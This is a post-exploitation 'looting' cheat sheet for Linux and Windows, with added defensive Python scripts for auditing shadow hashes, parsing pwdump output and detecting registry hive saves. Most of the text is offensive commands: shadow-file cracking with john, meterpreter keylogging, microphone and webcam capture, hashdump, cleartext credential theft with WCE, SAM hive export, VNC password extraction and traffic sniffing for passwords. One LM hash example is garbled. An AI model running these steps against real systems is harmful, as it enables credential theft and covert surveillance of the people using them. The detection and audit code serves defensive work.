Loot Linux
Passwords and hashes
First grab the passwd and shadow files (reading /etc/shadow requires root):
cat /etc/passwd
cat /etc/shadow
We can crack the passwords using John the Ripper like this:
unshadow passwd shadow > unshadowed.txt
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
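Before spending time on john it is worth knowing which hash algorithms the shadow file actually contains, since traditional DES and md5crypt fall to a wordlist run far faster than sha512crypt or bcrypt. The following added audit script (not part of the original post) classifies each shadow entry by its crypt(3) prefix; the shadow lines are constructed samples with placeholder hashes.

```python
import re
from typing import Dict, List

# Constructed /etc/shadow sample with placeholder hashes (not real credentials).
SAMPLE_SHADOW = """\
root:$6$rounds=5000$saltsalt$PLACEHOLDER_SHA512_HASH:19000:0:99999:7:::
legacy:$1$abcdefgh$PLACEHOLDER_MD5_HASH:18000:0:99999:7:::
olddes:AbCdEfGhIjKlM:17000:0:99999:7:::
svc:!:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
nopass::19000:0:99999:7:::
"""

# crypt(3) id prefix -> algorithm name.  Anything not listed here is checked
# for the 13-character traditional DES format, which john cracks fastest.
PREFIXES = {
    "$1$": "md5crypt",
    "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$y$": "yescrypt",
}

# Classes a defender should treat as effectively crackable with a wordlist run.
WEAK = {"EMPTY", "descrypt", "md5crypt"}

def classify_hash(field: str) -> str:
    """Return the hash algorithm (or account state) for one shadow password field."""
    if field == "":
        return "EMPTY"                      # login with no password at all
    if field[0] in "!*":
        return "LOCKED"                     # disabled; nothing for unshadow/john to crack
    for prefix, name in PREFIXES.items():
        if field.startswith(prefix):
            return name
    if re.fullmatch(r"[./0-9A-Za-z]{13}", field):
        return "descrypt"                   # traditional DES crypt, 8-char password limit
    return "UNKNOWN"

def audit_shadow(text: str) -> Dict[str, str]:
    """Map each account name in shadow-format text to its hash classification."""
    result: Dict[str, str] = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2 and fields[0]:
            result[fields[0]] = classify_hash(fields[1])
    return result

def weak_accounts(text: str) -> List[str]:
    """Accounts whose stored hash (or lack of one) makes the wordlist attack cheap."""
    return sorted(user for user, cls in audit_shadow(text).items() if cls in WEAK)
```

Run it on a real shadow file with audit_shadow(open("/etc/shadow").read()) as root; anything reported as descrypt, md5crypt or EMPTY should be migrated to sha512crypt or yescrypt (ENCRYPT_METHOD in /etc/login.defs) and the password reset.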
Interesting files
# Meterpreter
search -f *.txt
search -f *.zip
search -f *.doc
search -f *.xls
search -f config*
search -f *.rar
search -f *.docx
search -f *.sql
Other locations worth checking:
.ssh
.bash_history
/var/mail
/var/spool/mail
Tcpdump
Fast command:
tcpdump -i any -s0 -w capture.pcap
tcpdump -i eth0 -w capture -n -U -s 0 src not 192.168.1.X and dst not 192.168.1.X
tcpdump -vv -i eth0 src not 192.168.1.X and dst not 192.168.1.X
First we need to figure out which interfaces the machine is using (ifconfig). Then we can start listening on one of them and capture packets.
Commands and flags
Let's start with the basics.
tcpdump - on its own, this command prints all network traffic straight to the terminal. It can be hard to follow if there is a lot of traffic.
-A - print the packet contents in ASCII.
-w file.pcap - the w-flag saves the output to the file of your choice. The traffic is stored in pcap format, which is the standard packet-analysis format.
-i any - capture traffic on all interfaces.
-D - list all available interfaces.
-q - be less verbose (quiet output).
-s - snapshot length. By default tcpdump captures only the first 96 bytes of each packet; if you want more you have to set it yourself. -s0 gives you the whole packet.
-c - count. Stop after capturing the given number of packets. Useful if you have a non-interactive shell, since you can capture packets without having to stop tcpdump with Ctrl-C.
port 22 - only see traffic on a specific port.
-vvv - verbose. Add more v's depending on how verbose you want the output.
Useful commands
Lots of good stuff here http://www.rationallyparanoid.com/articles/tcpdump.html
tcpdump -i wlan0 -vvv -A | grep "GET"
This greps all GET requests from the wlan0 interface. It will not see anything inside SSL-encrypted traffic.
sudo tcpdump -i wlan0 src port 80 or dst port 80 -w port-80-recording.pcap
sudo tcpdump -i eth0 src port 80 or dst port 80 -w port-80-recording.pcap
Print the traffic in hex with ascii interpretation.
tcpdump -nX -r file.pcap
Only record TCP traffic:
tcpdump tcp -w file.pcap
Sniffing for passwords
Once we have dumped some traffic we can feed it into Metasploit and run psnuffle on it. It can sniff passwords and usernames from POP3, IMAP, FTP and HTTP GET. This is a really easy way to find usernames and passwords in traffic that you have already dumped, or are in the process of dumping.
use auxiliary/sniffer/psnuffle
https://www.offensive-security.com/metasploit-unleashed/password-sniffing/
Loot Windows
Meterpreter
If you have a meterpreter shell you are able to do a lot of things with very little effort. If you do not have a meterpreter shell you can always create a payload with msfvenom (an ELF, EXE or other format) to upgrade your shell.
Show help for all commands (each individual command also accepts -h):
help
Dump Windows hashes for further analysis:
hashdump
Keylogger
keyscan_start
keyscan_dump
keyscan_stop
Mic and webcam commands
record_mic    - Record audio from the default microphone for X seconds
webcam_chat   - Start a video chat
webcam_list   - List webcams
webcam_snap   - Take a snapshot from the specified webcam
webcam_stream - Play a video stream from the specified webcam
Dumping passwords and hashes on Windows
This most likely requires administrative rights, which is why this chapter is found here and not under priv-esc. Once you have a hash you can move on to the Password Cracking chapter, where we discuss different techniques for cracking hashes.
Windows stores passwords in the SAM (Security Account Manager). How they are stored depends on the operating system. Up to and including Windows 2003 passwords were stored as both LAN Manager (LM) and NT LAN Manager (NTLM) hashes. LM is incredibly insecure. From Windows Vista on the system no longer stores LM hashes, only NTLM, so it is a bit more secure.
LM and NTLM: up to and including Windows 2003
NTLM only: Windows Vista and later
LM Hashes
LM hashes can be really easy to crack. In the example below the LM hash is the first hash field (after the RID).
Administrator:500:FA21A6D3CF(01B8BAAD3B435B51404EE:C294D192B82B6AA35C3DFCA81F1F59BC:::
Example of an entry with only an NT hash (the LM field is empty):
Administrator:500:NO PASSWORD*********************:BE134K40129560B46534340292AF4E72:::
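A defender reviewing a dump like the two lines above wants to know two things per account: is a real LM hash stored (rather than the empty-password LM value aad3b435b51404eeaad3b435b51404ee or pwdump7's "NO PASSWORD" marker), and is the NT hash that of an empty password (31d6cfe0d16ae931b73c59d7e0c089c0). The following added parser (not from the original post) answers both for pwdump-format records; the sample lines are constructed with placeholder hex values, and only the two well-known empty-password constants are real.

```python
from typing import Dict, List, NamedTuple

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of the empty password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password
HEXDIGITS = set("0123456789abcdef")

# Constructed pwdump-style lines (user:RID:LM:NT:::) with placeholder hex values.
SAMPLE_DUMP = """\
Administrator:500:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alice:1001:NO PASSWORD*********************:00112233445566778899aabbccddeeff:::
"""

class Account(NamedTuple):
    user: str
    rid: int
    lm_stored: bool    # a real LM hash is present: 14-char max, case-folded, DES-based
    nt_is_empty: bool  # the NT hash is that of an empty password

def parse_line(line: str) -> Account:
    """Parse one user:RID:LM:NT::: record; tolerate pwdump7's 'NO PASSWORD***' marker."""
    parts = line.strip().split(":")
    if len(parts) < 4:
        raise ValueError("not a pwdump record: %r" % line)
    user, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
    # The LM field counts as real only if it is 32 hex chars and not the empty-password
    # hash.  Both the empty-hash value and pwdump7's text marker mean no LM hash is
    # stored (LM disabled by policy, or the password is longer than 14 characters).
    lm_stored = len(lm) == 32 and set(lm) <= HEXDIGITS and lm != EMPTY_LM
    return Account(user, rid, lm_stored, nt == EMPTY_NT)

def findings(dump: str) -> Dict[str, List[str]]:
    """Group accounts by the weakness a defender should act on."""
    out: Dict[str, List[str]] = {"lm_stored": [], "empty_password": []}
    for line in dump.splitlines():
        if not line.strip():
            continue
        acct = parse_line(line)
        if acct.lm_stored:
            out["lm_stored"].append(acct.user)
        if acct.nt_is_empty:
            out["empty_password"].append(acct.user)
    return out
```

Accounts listed under lm_stored indicate a host where the NoLMHash policy is off or the dump predates the last password change; the fix is enabling the policy and rotating those passwords.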
fgdump.exe
We can use fgdump.exe (locate fgdump.exe on Kali) to extract NTLM and LM password hashes. Run it and a file called 127.0.0.1.pwdump is created containing the hashes. Now you can try to brute force them.
Windows Credential Editor (WCE)
WCE can steal NTLM passwords from memory in cleartext! There are different versions of WCE, one for 32-bit systems and one for 64-bit, so make sure you have the right one.
You can run it like this:
wce32.exe -w
Loot registry without tools
This might be a better technique than using tools like WCE and fgdump, since you don't have to upload any binaries. Save the registry hives:
C:\> reg.exe save hklm\sam c:\windows\temp\sam.save
C:\> reg.exe save hklm\security c:\windows\temp\security.save
C:\> reg.exe save hklm\system c:\windows\temp\system.save
The hashes can then be extracted from these files offline using secretsdump.py or pwdump.
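Because this technique uses only a built-in binary, the defender's handle on it is process command-line logging (Sysmon Event ID 1 or Security event 4688 with command-line auditing enabled): a reg save of the SAM, SECURITY or SYSTEM hive is rare in normal administration. The following added detection (not part of the original post) matches such command lines; the event strings are constructed samples, not real telemetry.

```python
import re
from typing import List, Optional, Tuple

# Constructed process command lines, as a Sysmon Event ID 1 / Security 4688 CommandLine
# field would carry them (not real telemetry).
SAMPLE_EVENTS = [
    r"reg.exe save hklm\sam c:\windows\temp\sam.save",
    r"reg  SAVE  HKLM\SECURITY C:\Users\Public\sec.hiv",
    r"reg.exe export hklm\software\microsoft out.reg",
    r'reg.exe save "hklm\system" c:\temp\system.save',
    r"reg.exe query hklm\sam",
    r"notepad.exe c:\windows\temp\sam.save",
]

# reg or reg.exe (optionally with a path), the save verb, then one of the three hives
# that together let secretsdump.py recover local hashes and cached secrets.
HIVE_SAVE = re.compile(
    r"""^\s*"?(?:[^"\s]*\\)?reg(?:\.exe)?"?\s+   # reg / reg.exe, optional path, quotes
        save\s+                                  # the hive-export verb
        "?(?:hklm|hkey_local_machine)\\          # root key, both spellings
        (sam|security|system)\b""",              # hive name (capture group 1)
    re.IGNORECASE | re.VERBOSE,
)

def detect_hive_save(cmdline: str) -> Optional[str]:
    """Return the hive name if the command saves SAM/SECURITY/SYSTEM, else None."""
    m = HIVE_SAVE.match(cmdline)
    return m.group(1).upper() if m else None

def triage(events: List[str]) -> List[Tuple[str, str]]:
    """Filter a batch of command lines down to (cmdline, hive) hits.
    Legitimate backup jobs can match too, so enrich hits with user and parent process."""
    hits = []
    for e in events:
        hive = detect_hive_save(e)
        if hive:
            hits.append((e, hive))
    return hits
```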
Pwdump 7
http://www.tarasco.org/security/pwdump_7/
VNC
VNC requires its own password to log in, so it is not the same as the user's password. If you have a meterpreter shell you can run the post-exploitation module to get the VNC password.
background
use post/windows/gather/credentials/vnc
set session X
exploit
Tcpdump on Windows
You can use meterpreter to easily take a packet capture, like this:
# Meterpreter
run packetrecorder -li
run packetrecorder -i 1
Search for interesting files
# Meterpreter
search -f *.txt
search -f *.zip
search -f *.doc
search -f *.xls
search -f config*
search -f *.rar
search -f *.docx
search -f *.sql
# Recursive search from a Windows command shell
dir /s
This post references the work by sushant747.